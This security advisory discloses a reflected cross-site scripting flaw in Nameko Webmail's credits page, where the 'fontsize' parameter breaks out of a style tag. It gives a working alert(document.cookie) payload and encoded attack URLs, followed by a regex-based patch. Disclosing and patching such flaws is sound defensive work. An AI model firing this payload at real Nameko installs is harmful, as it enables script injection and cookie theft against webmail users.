* Nameko Webmail XSS Vulnerability on version <= 0.10.146 * ======================================================== * * Homepage: http://www.wizshelf.org/nameko/ * Discovered by: Andrea Menin (base64 @: bWVuaW4uYW5kcmVhQGdtYWlsLmNvbQ==) * Follow me: http://www.linkedin.com/in/andreamenin * * ======================================================== Introduction: ------------- Nameko is a set of tools for working with e-mails in PHP. The core of Nameko is composed by a set of classes for retrieve mail from a POP3 server, and parsing them to get the body (both in plain text and HTML, if included) and the attachments. Is included the NamekoWebmail, that is a powerful webmail. Description: ------------ The XSS vulnerability is located on the credits page, where is possible to change the font size by an http get request (ex. fontsize=11). The "fontsize" variable write his content inside a <style> tag that is possible to break and execute any javascript inside a tag <script>. The URL for match the XSS, should be like (url-decoded): ?fontsize=11pt;+}+</style><script>alert(document.cookie)</script><style>body+{+font-size:11 XSS URL: -------- http[s]://** victim host **/nameko.php?op=999&id=&colorset=VIOLET&fontsize=11%3B+%7D%3C%2Fstyle%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3Cstyle%3EBODY+%7B+font-size%3A66 or http[s]://** victim host **/?op=999&id=&colorset=VIOLET&fontsize=11%3B+%7D%3C%2Fstyle%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3Cstyle%3EBODY+%7B+font-size%3A66 Patch: ------ Is possible to patch this by make a check on the $_GET['FONTSIZE'] var, making sure that it is numeric only. // On file nameko.php (line 93): if($_GET[fontsize]) $_SESSION[FONTSIZE]=$_GET[fontsize]; // should be replaced with something like that: if(preg_match('/^[0-9]{2,2}$/', $_GET[fontsize])) { $_SESSION[FONTSIZE]=$_GET[fontsize]; } else { $_SESSION[FONTSIZE]=11; } CREDITS: --------- This vulnerabilities has been discovered by Andrea Menin (base64 @: bWVuaW4uYW5kcmVhQGdtYWlsLmNvbQ==) LEGAL NOTICES: --------------- The Author accepts no responsibility for any damage caused by the use or misuse of this information.